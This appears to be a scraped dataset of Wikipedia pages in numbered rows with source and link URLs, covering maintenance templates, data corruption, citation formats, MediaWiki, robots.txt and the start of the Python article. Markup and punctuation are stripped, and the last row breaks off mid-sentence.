661 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Maintenance_template_removal | Many Wikipedia pages display maintenance templates that identify problems. You may have arrived at this help page after clicking a link on a maintenance template saying "Learn how and when to remove this template message". Maintenance templates are added and removed by volunteers. This help page explains the process for examining and removing such templates. Maintenance templates (or "tags") are not removed automatically. Even if you fix the issue(s) described in a maintenance template, the tag will remain in the article until you or someone else manually removes it. The mechanics of removal are usually as simple as clicking "Edit" at the top of the page or in the section involved (if you're not already in edit mode), removing the code that produces the display of the template, leaving an edit summary, and saving the page. It is not okay to remove maintenance templates until the issue flagged by the template is remedied first—that is, until the maintenance tag is no longer valid—unless it truly did not belong in the first place. Wikipedia works because of the efforts of volunteers just like you, making bold edits to help build this encyclopedia. Fixing problems and then removing maintenance templates when you are done is important in that effort. We don't know which maintenance tag brought you to this page, and thus what specific problem needs attention. However, every maintenance template contains links to help pages, policies, guidelines, or other relevant pages that provide information on the problem the template was placed to flag. You will also find guidance on some of the more common templates below. Many common templates address problems with article citations and references, or their lack because reliable sourcing is the lifeblood of Wikipedia articles and at the core of all of Wikipedia's content policies and guidelines, such as notability, verifiability, neutral point of view, and no original research. But a host of other issues may be flagged, including tone and style of writing, structure, and formatting, lack of links to or from other articles, compliance with Wikipedia's manual of style and the lack of a lead section. Please make sure the issue has been resolved before removing the template. That does require some effort on your part—to understand both the problem and how to solve it. If the issue flagged by the maintenance template is that the article contains no references, a citation needed template used might be Unreferenced typically placed by the code you would see when wikitext (source) editing: Unreferenced date August 2024 . It is important to understand that what you see when reading an article, and what you see when editing it, are different unless you're in Visual editing mode. Thus, the above code, only seen when doing source editing, results in the display of the 'called' template below: This template contains several links, indicated by the words and phrases in blue. Three of these links are to pages that, when explored, provide context and resources for you to understand why the template was placed on the page, and how to address the issue of the article being unreferenced: Whatever maintenance tag brought you to this help page should likewise contain relevant explanatory links addressed to whatever its issue is. Read these explanatory and contextual pages to learn about the problem and what it is you need to do to take care of it. Again, some of the more common maintenance templates seen are addressed in the specific template guidance section below. Maintenance templates are not meant to be in articles permanently. Any user without a conflict of interest may remove a maintenance template in any of the following circumstances: You should not remove maintenance templates if any of the following apply: Have you carefully read the help pages and thoroughly fixed the problem? Or have you made a considered decision that the template is not, or is no longer, applicable? Great Now, to remove the maintenance template: That's it. Thank you Problems flagged by some templates may imply secondary problems that will still exist after you take care of the main issue. In such cases, it may be more appropriate to switch the template to another applicable one following your edits, rather than just removing it. The reasoning behind the change in templates should be addressed in the edit summary. A case in point is the Unreferenced template example used above. It is placed on pages with no references. Thus, adding just one suitable reference renders that maintenance template inapplicable. However, that change does not take care of the overarching issue of poor sourcing. In this example, a change to a different template may be appropriate, depending on the type, quality, depth, and manner of sourcing added to fix the issue, such as refimprove , No footnotes , Primary sources , or one of the many others listed at Wikipedia:Template messages Sources of articles. Conversely, some templates flag highly discrete issues where there is no need to consider a switch to another template. For example, if an article is "orphaned" no other articles in the main article namespace link to it then once that is taken care of (by the addition of links to it from other articles), the issue is gone entirely and the tag's removal is unambiguous. When a flagged issue has been addressed in parts of an article but remains in discrete sections, clarity may be served by replacing the template with a section variant, or by use of inline cleanup tags, if such versions of the template exist. In some cases, it may be helpful to request a review of a maintenance template's removal or proposed removal with the editor who initially added it to the article at issue. This section guides you on how to address some of the more common specific templates that may have brought you to this help page. More detailed information about the templates can be found by following the links to the templates themselves. Click "show" at the right to display the instructions. Some articles will be flagged for multiple discrete problems using a single template: Multiple issues . If you take care of one or more problems that it flags but not all, do not remove the template entirely but just those parameters in it that you have fixed. The example below shows three different issues flagged by this template: If you address the "orphaning" issue, but not the other two, remove just the line that flagged the orphan issue and leave the others intact. Thus, your removal would leave the template in this state. See the sections below for how to address some of the more common problems flagged by templates that may be wrapped into this template. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing. For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. Unreferenced , typically placed by the code Unreferenced date August 2024 , having redirects such as Unsourced , Unverified , No references , No sources , and Unref , and displaying when reading as: flags the issue of an article containing no references at all. This template no longer applies once a single reference appears in the article, whether placed through the preferred method of inline citations, ones appearing in a general references section, or even through such a poor method as including an embedded raw link. To address the issue, add citations to reliable sources. Because of their importance, Wikipedia contains numerous instruction pages on aspects of referencing. We suggest starting with Help:Referencing for beginners and Help:Introduction to referencing 1, and then seeing Wikipedia:Citing sources for a more involved treatment, noting that each contains see also sections linking to additional help pages, guides, and tutorials. A visual guide to placing inline citations through ref ... ref tags may also help, and appears below. In brief, anywhere you want a footnote to appear in a piece of text, you place an opening ref tag followed by the text of the citation which you want to appear at the bottom of the article, and close with a ref tag. Note the closing slash ( ). For multiple use of a single reference, the opening ref tag is given a name, like so: ref name "name" followed by the citation text and a closing ref tag. Each time you want to use that footnote again, you simply use the first element with a slash, like so: ref name "name" . For these references to appear, you must tell the software where to display them, using either the code references or, most commonly, the template, Reflist which can be modified to display the references in columns using Reflist colwidth 30em . Per our style guidelines, the references should be displayed in a separate section denominated "References" located after the body of the article. Multiple ref name "multiple" Citation text3. ref citation ref name "multiple" use. ref name "multiple" References Reflist Multiple 3 citation 3 use. 3 References Citation Cite web Cite book Cite news Cite journal Others Examples As noted higher on this page, unless you thoroughly source a page in response to this template, it may more appropriate to switch this template with a more specific one rather than simply removing it. Depending on the type, quality, depth, and manner of sourcing added to fix the issue, you might replace it with refimprove , No footnotes , Primary sources or a host of others listed at Wikipedia:Template messages Sources of articles. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing. For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. Refimprove , typically placed by the code Refimprove date August 2024 , having redirects such as Improve references , Verify , More sources and Citations needed , and displaying when reading as: flags the issue of an article that has some, but insufficient inline citations to support the material currently in the article. It should not be used for articles with no sources at all ( unreferenced should be used instead), nor for articles without inline citations but which contain some sources ( No footnotes should be used instead), nor for an article on living persons ( BLP sources should be used instead). This template no longer applies once an article has been made fairly well-sourced. To address the issue, add additional inline citations to reliable sources for all significant statements in the article. Whether or not an article has been rendered "fairly well sourced" may involve a judgment call, but in any event, the sources used must be reliable ones, and articles should not rely predominantly on primary sources, but rather on secondary sources. Note the minimum: all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material. All of Wikipedia's core content policies and guidelines have a common denominator: the need for reliable sourcing. For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. No footnotes , typically placed by the code No footnotes date August 2024 , and having redirects such as Citations , No citations , Inline citations and No inline citations , and displaying when reading as: flags the issue of an article that contains some form of sourcing but lacks the precision of inline citations to associate given portions of material with a specific reliable source(s) that support that material. Inline citations make verifiability accessible. In short, in the absence of an inline citation that associates specific material to a specific source, it becomes very difficult for a reader to check what sources, given in only some general manner, verify what items of content. To address the issue, add inline citations to reliable sources, ideally for all significant statements in the article. Note that at a minimum: all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material. There are many instruction pages that directly and indirectly give guidance on adding inline citations. We suggest starting with Help:Referencing for beginners and Help:Introduction to referencing 1, and then seeing Wikipedia:Citing sources for a more involved treatment, noting that each contains see also sections linking to additional help pages, guides, and tutorials. A visual guide to placing inline citations through ref ... ref tags may also help, and appears below. In brief, anywhere you want a footnote to appear in a piece of text, you place an opening ref tag followed by the text of the citation which you want to appear at the bottom of the article, and close with a ref tag. Note the closing slash ( ). For multiple use of a single reference, the opening ref tag is given a name, like so: ref name "name" followed by the citation text and a closing ref tag. Each time you want to use that footnote again, you simply use the first element with a slash, like so: ref name "name" . For these references to appear, you must tell the software where to display them, using either the code references or, most commonly, the template, Reflist which can be modified to display the references in columns using Reflist colwidth 30em . Per our style guidelines, the references should be displayed in a separate section denominated "References" located after the body of the article. Multiple ref name "multiple" Citation text3. ref citation ref name "multiple" use. ref name "multiple" References Reflist Multiple 3 citation 3 use. 3 References Citation Cite web Cite book Cite news Cite journal Others Examples Primary sources , typically placed by the code Primary sources date August 2024 , having among other redirects Primary , and displaying when reading as: flags the issue of an article that too heavily relies on primary sources original materials that are close to an event; often accounts written by people who are directly involved as opposed to secondary, and to some extent, tertiary sources. Primary sources have their place but they must be used carefully and are easy to misuse. Typically, they should only be used for straightforward, descriptive statements of facts that can be verified by any educated person with access to the primary source but without further, specialized knowledge. They should not be used to support content that presents interpretation, analysis, evaluation, or synthesis, and should not be the predominant form of sourcing in an article. Moreover, primary sources are generally not useful to demonstrate a topic's notability. To address the issue, add citations predominantly to secondary sources. Often this involves replacing some of the primary sources with secondary sources, and not just adding them alongside existing ones—especially where the primary source is being used for an invalid purpose such as interpretive claims and synthesis. Finding secondary sources is a large topic but make use of Google Books, News, and Scholar; find local newspaper archives; go to a library; if you have access, use pay subscription services like JSTOR, Newspaperarchive.com; Ancestry.com, etc.; see our guide on free English newspaper sources and others listed here; request access to pay prescription sources at WP:RX. If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Wikipedia is an encyclopedia, a specific type of reference work properly containing articles on topics of knowledge. Wikipedia employs the concept of notability to avoid indiscriminate inclusion of topics by attempting to ensure that the subjects of articles are "worthy of notice" by only including articles on topics that the world has taken note of by substantively treating them in reliable sources unconnected with the topic. The general notability standard thus presumes that topics are notable if they have "received significant coverage in reliable sources that are independent of the subject". Notability , typically placed by the code Notability date August 2024 , having redirects such as Notable , Non-notable , Nn and Significance , and displaying when reading as: (or some variation linking to one of the subject-specific notability guidelines) questions whether a topic is notable. As stated in the template, addressing the issue requires adding citations to reliable secondary sources. There are several common mistakes seen in addressing this issue: If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Advert , typically placed by the code Advert date August 2024 , and having redirects such as Advertisement , Advertising , Ad and Puff , and displaying when reading as: flags the issue of an article that reads like an advertisement. For example, such articles may tell users to buy a company's product, provide price lists, give links to online sellers, use unencyclopedic or meaningless buzzwords, be filled with peacock language and read like the website of the article's topic or a press release touting its virtues, rather than that of a neutrally-written encyclopedia article about the topic. Advertisements are by no means limited to commercial topics and indeed are often seen for all manner of others, such as "noble causes", religious spiritual leaders, sports teams, gaming clans and so forth. If the article's main problem is not advertising per se, then you can change the tag to something more appropriate, such as COI or Peacock or POV check . Pages that are exclusively promotional and would need to be fundamentally rewritten to become encyclopedic may be tagged for speedy deletion under section G11 of the criteria using db-g11 or db-spam . To address the issue, rewrite the article from a neutral point of view which is not just about the wording and tone, but also what the article covers and what it does not cover. Wikipedia articles should represent fairly, proportionately, and, as far as possible, without editorial bias, all of the significant views that have been published by reliable sources on a topic. Removing all promotional language is a good start, but depending on what is left, may only be a surface treatment. See what you can salvage, but often editors strip out all but the most basic content, leaving it in a stub state. If you want to build a solid article, explore the existence of independent sources for the topic, and build it from the ground up. POV , typically placed by the code POV date August 2024 , and having redirects such as NPOV , POV dispute , Neutrality , Neutral and Not neutral , and displaying when reading as: flags the issue of an article that has been identified as having a serious issue of balance, the lack of a neutral point of view, and the tagger wishes to attract editors with different viewpoints to the article. An unbalanced or non-neutral article does not fairly represent the balance of perspectives of high-quality, reliable secondary sources. This tag is meant to be accompanied by an explanation on the article's talk page about why it was added, identifying specific issues that are actionable within Wikipedia's content policies. This template is not meant to be a permanent resident on any article. You may remove this template whenever any one of the following is true: Lead missing , typically placed by the code Lead missing date August 2024 , and having redirects such as No lead , Nointro , No lead section , Lead absent and Intro needed , and displaying when reading as: flags the issue of an article that fails to follow Wikipedia's standard article layout guidelines by introducing the reader to the topic in a lead section containing a summary of the most important article contents. The lead should stand on its own as a concise overview of the article's topic. A good lead section cultivates the reader's interest in reading more of the article, but not by teasing the reader or hinting at content that follows. It should identify the topic, establish context, explain why the topic is notable, and summarize the most important points, including any prominent controversies. To address the issue, write a lead section. The size of an appropriate lead will depend on the breadth of the article but it should be no more than four well-composed paragraphs, and should generally not contain content that is not already present in the body of the article. Current , typically placed by the code Current date August 2024 , and displaying when reading as: (or a subject-specific variation listed on Wikipedia:Current event templates) warns editors and readers about an article that is the subject of a current event, such as a breaking news story, that is accordingly experiencing a great flux of edits and is in a fast-changing state. Wikipedia attracts numerous editors who want to update articles in real time immediately after such current events are published. However, sources for breaking news reports often contain serious inaccuracies, so these templates can also draw attention to the need to add improved sources as soon as they become available. The template should generally be removed when the event described is no longer receiving massive editing attention. It is not meant to be a general disclaimer indicating that an article's contents may not be accurate, or to mark an article that merely has recent news articles about the topic (if it were, hundreds of thousands of articles would have the Current template, with no informational consequence). If the article continues to have sourcing or cleanup issues, a more appropriate maintenance template should be used instead. Linkrot , typically placed by the code Linkrot date August 2024 , and displaying when reading as: flags an article as having bare URLs, URLs that are used as references or external links without contextual information. These bare URLs are particularly vulnerable to link rot, as the record of the reference depends on the hosting website maintaining the current site structure, which is not guaranteed. A change in the underlying URL could make the reference unusable. The full citation format, on the other hand, preserves information (such as title and author) that can be used to restore a version of the reference that is still accessible. In addition, bare URLs can be less visually pleasing if the underlying URL is long. To address this issue, convert all bare URLs used as references to the appropriate citation template format. For bare URLs which are not used as references, use the following format: bare URL Descriptive text . Depending on the specific URL, it may be necessary to use an archiving service to restore an URL. More information is available at Repairing a dead link. As noted previously, most templates contain links to guidance pages. Additionally, many templates have documentation that provides more information about the template's flagged issue, which is displayed when you visit the template page itself. To access the template and thereby see its documentation, type into the search field Template:, followed by the name of the template, seen when you view its placement in the Edit interface (typically found in the first lines of the article). The first "parameter" is the name of the template. For example, if you found this in the Edit interface, Unreferenced date August 2024 , then you would visit the template itself by searching for Template:Unreferenced. The accompanying documentation for all maintenance templates, if it exists, can be located in this way. If you've read through this page and are still confused about what needs to be done to fix an issue on a page and remove a maintenance template, try asking at the Teahouse, a page designed for new users to ask questions. Alternatively, you could try the more general Help desk, or seek live assistance at the IRC channel: wikipedia-en-help. |
662 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_corruption | Data corruption refers to errors in computer data that occur during writing, reading, storage, transmission, or processing, which introduce unintended changes to the original data. Computer, transmission, and storage systems use a number of measures to provide end-to-end data integrity, or lack of errors. In general, when data corruption occurs, a file containing that data will produce unexpected results when accessed by the system or the related application. Results could range from a minor loss of data to a system crash. For example, if a document file is corrupted, when a person tries to open that file with a document editor they may get an error message, thus the file might not be opened or might open with some of the data corrupted (or in some cases, completely corrupted, leaving the document unintelligible). The adjacent image is a corrupted image file in which most of the information has been lost. Some types of malware may intentionally corrupt files as part of their payloads, usually by overwriting them with inoperative or garbage code, while a non-malicious virus may also unintentionally corrupt files when it accesses them. If a virus or trojan with this payload method manages to alter files critical to the running of the computer's operating system software or physical hardware, the entire system may be rendered unusable. Some programs can give a suggestion to repair the file automatically (after the error), and some programs cannot repair it. It depends on the level of corruption, and the built-in functionality of the application to handle the error. There are various causes of the corruption. There are two types of data corruption associated with computer systems: undetected and detected. Undetected data corruption, also known as silent data corruption, results in the most dangerous errors as there is no indication that the data is incorrect. Detected data corruption may be permanent with the loss of data, or may be temporary when some part of the system is able to detect and correct the error; there is no data corruption in the latter case. Data corruption can occur at any level in a system, from the host to the storage medium. Modern systems attempt to detect corruption at many layers and then recover or correct the corruption; this is almost always successful but very rarely the information arriving in the systems memory is corrupted and can cause unpredictable results. Data corruption during transmission has a variety of causes. Interruption of data transmission causes information loss. Environmental conditions can interfere with data transmission, especially when dealing with wireless transmission methods. Heavy clouds can block satellite transmissions. Wireless networks are susceptible to interference from devices such as microwave ovens. Hardware and software failure are the two main causes for data loss. Background radiation, head crashes, and aging or wear of the storage device fall into the former category, while software failure typically occurs due to bugs in the code. Cosmic rays cause most soft errors in DRAM. 1 Some errors go unnoticed, without being detected by the disk firmware or the host operating system; these errors are known as silent data corruption. 2 There are many error sources beyond the disk storage subsystem itself. For instance, cables might be slightly loose, the power supply might be unreliable, 3 external vibrations such as a loud sound, 4 the network might introduce undetected corruption, 5 cosmic radiation and many other causes of soft memory errors, etc. In 39,000 storage systems that were analyzed, firmware bugs accounted for 5 10% of storage failures. 6 All in all, the error rates as observed by a CERN study on silent corruption are far higher than one in every 1016 bits. 7 Webshop Amazon.com has acknowledged similar high data corruption rates in their systems. 8 In 2021, faulty processor cores were identified as an additional cause in publications by Google and Facebook; cores were found to be faulty at a rate of several in thousands of cores. 9 10 One problem is that hard disk drive capacities have increased substantially, but their error rates remain unchanged. The data corruption rate has always been roughly constant in time, meaning that modern disks are not much safer than old disks. In old disks the probability of data corruption was very small because they stored tiny amounts of data. In modern disks the probability is much larger because they store much more data, whilst not being safer. That way, silent data corruption has not been a serious concern while storage devices remained relatively small and slow. In modern times and with the advent of larger drives and very fast RAID setups, users are capable of transferring 1016 bits in a reasonably short time, thus easily reaching the data corruption thresholds. 11 As an example, ZFS creator Jeff Bonwick stated that the fast database at Greenplum, which is a database software company specializing in large-scale data warehousing and analytics, faces silent corruption every 15 minutes. 12 As another example, a real-life study performed by NetApp on more than 1.5 million HDDs over 41 months found more than 400,000 silent data corruptions, out of which more than 30,000 were not detected by the hardware RAID controller (only detected during scrubbing). 13 Another study, performed by CERN over six months and involving about 97 petabytes of data, found that about 128 megabytes of data became permanently corrupted silently somewhere in the pathway from network to disk. 14 Silent data corruption may result in cascading failures, in which the system may run for a period of time with undetected initial error causing increasingly more problems until it is ultimately detected. 15 For example, a failure affecting file system metadata can result in multiple files being partially damaged or made completely inaccessible as the file system is used in its corrupted state. When data corruption behaves as a Poisson process, where each bit of data has an independently low probability of being changed, data corruption can generally be detected by the use of checksums, and can often be corrected by the use of error correcting codes (ECC). If an uncorrectable data corruption is detected, procedures such as automatic retransmission or restoration from backups can be applied. Certain levels of RAID disk arrays have the ability to store and evaluate parity bits for data across a set of hard disks and can reconstruct corrupted data upon the failure of a single or multiple disks, depending on the level of RAID implemented. Some CPU architectures employ various transparent checks to detect and mitigate data corruption in CPU caches, CPU buffers and instruction pipelines; an example is Intel Instruction Replay technology, which is available on Intel Itanium processors. 16 Many errors are detected and corrected by the hard disk drives using the ECC codes 17 which are stored on disk for each sector. If the disk drive detects multiple read errors on a sector it may make a copy of the failing sector on another part of the disk, by remapping the failed sector of the disk to a spare sector without the involvement of the operating system (though this may be delayed until the next write to the sector). This "silent correction" can be monitored using S.M.A.R.T. and tools available for most operating systems to automatically check the disk drive for impending failures by watching for deteriorating SMART parameters. Some file systems, such as Btrfs, HAMMER, ReFS, and ZFS, use internal data and metadata checksumming to detect silent data corruption. In addition, if a corruption is detected and the file system uses integrated RAID mechanisms that provide data redundancy, such file systems can also reconstruct corrupted data in a transparent way. 18 This approach allows improved data integrity protection covering the entire data paths, which is usually known as end-to-end data protection, compared with other data integrity approaches that do not span different layers in the storage stack and allow data corruption to occur while the data passes boundaries between the different layers. 19 Data scrubbing is another method to reduce the likelihood of data corruption, as disk errors are caught and recovered from before multiple errors accumulate and overwhelm the number of parity bits. Instead of parity being checked on each read, the parity is checked during a regular scan of the disk, often done as a low priority background process. The "data scrubbing" operation activates a parity check. If a user simply runs a normal program that reads data from the disk, then the parity would not be checked unless parity-check-on-read was both supported and enabled on the disk subsystem. If appropriate mechanisms are employed to detect and remedy data corruption, data integrity can be maintained. This is particularly important in commercial applications (e.g. banking), where an undetected error could either corrupt a database index or change data to drastically affect an account balance, and in the use of encrypted or compressed data, where a small error can make an extensive dataset unusable. 7 |
663 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Special:CiteThisPage&page=Web_scraping&id=1240545829&wpFormIdentifier=titleform | IMPORTANT NOTE: Most educators and professionals do not consider it appropriate to use tertiary sources such as encyclopedias as a sole source for any information—citing an encyclopedia as an important reference in footnotes or bibliographies may result in censure or a failing grade. Wikipedia articles should be used for background information, as a reference for correct terminology and search terms, and as a starting point for further research. As with any community-built reference, there is a possibility for error in Wikipedia's content—please check your facts against multiple sources and read our disclaimers for more information. Please remember to check your manual of style, standards guide or instructor's guidelines for the exact syntax to suit your needs. For more detailed advice, see Citing Wikipedia. Wikipedia contributors. (2024, August 15). Web scraping. In Wikipedia, The Free Encyclopedia. Retrieved 15:40, August 17, 2024, from https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 Wikipedia contributors. "Web scraping. Wikipedia, The Free Encyclopedia. Wikipedia, The Free Encyclopedia, 15 Aug. 2024. Web. 17 Aug. 2024. Wikipedia contributors, 'Web scraping', Wikipedia, The Free Encyclopedia, 15 August 2024, 23:25 UTC, https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 accessed 17 August 2024 Wikipedia contributors, "Web scraping, Wikipedia, The Free Encyclopedia, https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 (accessed August 17, 2024). Wikipedia contributors. Web scraping Internet . Wikipedia, The Free Encyclopedia; 2024 Aug 15, 23:25 UTC cited 2024 Aug 17 . Available from: https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829. Web scraping, https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829 (last visited Aug. 17, 2024). Wikipedia contributors. Web scraping. Wikipedia, The Free Encyclopedia. August 15, 2024, 23:25 UTC. Available at: https: en.wikipedia.org w index.php?title Web scraping oldid 1240545829. Accessed August 17, 2024. When using the LaTeX package url ( usepackage url somewhere in the preamble), which tends to give much more nicely formatted web addresses, the following may be preferred: |
664 | https://en.wikipedia.org/wiki/Data_scraping | https://www.mediawiki.org | The MediaWiki software is used by tens of thousands of websites and thousands of companies and organisations. It powers Wikipedia and also this website. MediaWiki helps you collect and organise knowledge and make it available to people. It's powerful, multilingual, free and open, extensible, customisable, reliable, and free of charge. Find out more and if MediaWiki is right for you. More news |
665 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Robots_exclusion_standard | robots.txt is the filename used for implementing the Robots Exclusion Protocol, a standard used by websites to indicate to visiting web crawlers and other web robots which portions of the website they are allowed to visit. The standard, developed in 1994, relies on voluntary compliance. Malicious bots can use the file as a directory of which pages to visit, though standards bodies discourage countering this with security through obscurity. Some archival sites ignore robots.txt. The standard was used in the 1990s to mitigate server overload. In the 2020s many websites began denying bots that collect information for generative artificial intelligence. The "robots.txt" file can be used in conjunction with sitemaps, another robot inclusion standard for websites. The standard was proposed by Martijn Koster, 1 2 when working for Nexor 3 in February 1994 4 on the www-talk mailing list, the main communication channel for WWW-related activities at the time. Charles Stross claims to have provoked Koster to suggest robots.txt, after he wrote a badly behaved web crawler that inadvertently caused a denial-of-service attack on Koster's server. 5 The standard, initially RobotsNotWanted.txt, allowed web developers to specify which bots should not access their website or which pages bots should not access. The internet was small enough in 1994 to maintain a complete list of all bots; server overload was a primary concern. By June 1994 it had become a de facto standard; 6 most complied, including those operated by search engines such as WebCrawler, Lycos, and AltaVista. 7 On July 1, 2019, Google announced the proposal of the Robots Exclusion Protocol as an official standard under Internet Engineering Task Force. 8 A proposed standard 9 was published in September 2022 as RFC 9309. When a site owner wishes to give instructions to web robots they place a text file called robots.txt in the root of the web site hierarchy (e.g. https: www.example.com robots.txt). This text file contains the instructions in a specific format (see examples below). Robots that choose to follow the instructions try to fetch this file and read the instructions before fetching any other file from the website. If this file does not exist, web robots assume that the website owner does not wish to place any limitations on crawling the entire site. A robots.txt file contains instructions for bots indicating which web pages they can and cannot access. Robots.txt files are particularly important for web crawlers from search engines such as Google. A robots.txt file on a website will function as a request that specified robots ignore specified files or directories when crawling a site. This might be, for example, out of a preference for privacy from search engine results, or the belief that the content of the selected directories might be misleading or irrelevant to the categorization of the site as a whole, or out of a desire that an application only operates on certain data. Links to pages listed in robots.txt can still appear in search results if they are linked to from a page that is crawled. 10 A robots.txt file covers one origin. For websites with multiple subdomains, each subdomain must have its own robots.txt file. If example.com had a robots.txt file but a.example.com did not, the rules that would apply for example.com would not apply to a.example.com. In addition, each protocol and port needs its own robots.txt file; http: example.com robots.txt does not apply to pages under http: example.com:8080 or https: example.com . The robots.txt protocol is widely complied with by bot operators. 6 Some major search engines following this standard include Ask, 11 AOL, 12 Baidu, 13 Bing, 14 DuckDuckGo, 15 Google, 16 Yahoo , 17 and Yandex. 18 Some web archiving projects ignore robots.txt. Archive Team uses the file to discover more links, such as sitemaps. 19 Co-founder Jason Scott said that "unchecked, and left alone, the robots.txt file ensures no mirroring or reference for items that may have general use and meaning beyond the website's context. 20 In 2017, the Internet Archive announced that it would stop complying with robots.txt directives. 21 6 According to Digital Trends, this followed widespread use of robots.txt to remove historical sites from search engine results, and contrasted with the nonprofit's aim to archive "snapshots" of the internet as it previously existed. 22 Starting in the 2020s, web operators began using robots.txt to deny access to bots collecting training data for generative AI. In 2023, Originality.AI found that 306 of the thousand most-visited websites blocked OpenAI's GPTBot in their robots.txt file and 85 blocked Google's Google-Extended. Many robots.txt files named GPTBot as the only bot explicitly disallowed on all pages. Denying access to GPTBot was common among news websites such as the BBC and The New York Times. In 2023, blog host Medium announced it would deny access to all artificial intelligence web crawlers as "AI companies have leached value from writers in order to spam Internet readers". 6 GPTBot complies with the robots.txt standard and gives advice to web operators about how to disallow it, but The Verge's David Pierce said this only began after "training the underlying models that made it so powerful". Also, some bots are used both for search engines and artificial intelligence, and it may be impossible to block only one of these options. 6 404 Media reported that companies like Anthropic and Perplexity.ai circumvented robots.txt by renaming or spinning up new scrapers to replace the ones that appeared on popular blocklists. 23 Despite the use of the terms "allow" and "disallow", the protocol is purely advisory and relies on the compliance of the web robot; it cannot enforce any of what is stated in the file. 24 Malicious web robots are unlikely to honor robots.txt; some may even use the robots.txt as a guide to find disallowed links and go straight to them. While this is sometimes claimed to be a security risk, 25 this sort of security through obscurity is discouraged by standards bodies. The National Institute of Standards and Technology (NIST) in the United States specifically recommends against this practice: "System security should not depend on the secrecy of the implementation or its components. 26 In the context of robots.txt files, security through obscurity is not recommended as a security technique. 27 Many robots also pass a special user-agent to the web server when fetching content. 28 A web administrator could also configure the server to automatically return failure (or pass alternative content) when it detects a connection using one of the robots. 29 30 Some sites, such as Google, host a humans.txt file that displays information meant for humans to read. 31 Some sites such as GitHub redirect humans.txt to an About page. 32 Previously, Google had a joke file hosted at killer-robots.txt instructing the Terminator not to kill the company founders Larry Page and Sergey Brin. 33 34 This example tells all robots that they can visit all files because the wildcard stands for all robots and the Disallow directive has no value, meaning no pages are disallowed. The same result can be accomplished with an empty or missing robots.txt file. This example tells all robots to stay out of a website: This example tells all robots not to enter three directories: This example tells all robots to stay away from one specific file: All other files in the specified directory will be processed. This example tells two specific robots not to enter one specific directory: Example demonstrating how comments can be used: It is also possible to list multiple robots with their own rules. The actual robot string is defined by the crawler. A few robot operators, such as Google, support several user-agent strings that allow the operator to deny access to a subset of their services by using specific user-agent strings. 16 Example demonstrating multiple user-agents: The crawl-delay value is supported by some crawlers to throttle their visits to the host. Since this value is not part of the standard, its interpretation is dependent on the crawler reading it. It is used when the multiple burst of visits from bots is slowing down the host. Yandex interprets the value as the number of seconds to wait between subsequent visits. 18 Bing defines crawl-delay as the size of a time window (from 1 to 30 seconds) during which BingBot will access a web site only once. 35 Google provides an interface in its search console for webmasters, to control the Googlebot's subsequent visits. 36 Some crawlers support a Sitemap directive, allowing multiple Sitemaps in the same robots.txt in the form Sitemap: full-url: 37 The Robot Exclusion Standard does not mention the character in the Disallow: statement. 38 In addition to root-level robots.txt files, robots exclusion directives can be applied at a more granular level through the use of Robots meta tags and X-Robots-Tag HTTP headers. The robots meta tag cannot be used for non-HTML files such as images, text files, or PDF documents. On the other hand, the X-Robots-Tag can be added to non-HTML files by using .htaccess and httpd.conf files. 39 The X-Robots-Tag is only effective after the page has been requested and the server responds, and the robots meta tag is only effective after the page has loaded, whereas robots.txt is effective before the page is requested. Thus if a page is excluded by a robots.txt file, any robots meta tags or X-Robots-Tag headers are effectively ignored because the robot will not see them in the first place. 39 The Robots Exclusion Protocol requires crawlers to parse at least 500 kibibytes (512000 bytes) of robots.txt files, 40 which Google maintains as a 500 kibibyte file size restriction for robots.txt files. 41 |
666 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Python_(programming_language) | Python is a high-level, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. 32 Python is dynamically typed and garbage-collected. It supports multiple programming paradigms, including structured (particularly procedural), object-oriented and functional programming. It is often described as a "batteries included" language due to its comprehensive standard library. 33 34 Guido van Rossum began working on Python in the late 1980s as a successor to the ABC programming language and first released it in 1991 as Python 0.9.0. 35 Python 2.0 was released in 2000. Python 3.0, released in 2008, was a major revision not completely backward-compatible with earlier versions. Python 2.7.18, released in 2020, was the last release of Python 2. 36 Python consistently ranks as one of the most popular programming languages, and has gained widespread use in the machine learning community. 37 38 39 40 Python was invented in the late 1980s 41 by Guido van Rossum at Centrum Wiskunde Informatica (CWI) in the Netherlands as a successor to the ABC programming language, which was inspired by SETL, 42 capable of exception handling and interfacing with the Amoeba operating system. 12 Its implementation began in December 1989. 43 Van Rossum shouldered sole responsibility for the project, as the lead developer, until 12 July 2018, when he announced his "permanent vacation" from his responsibilities as Python's "benevolent dictator for life" (BDFL), a title the Python 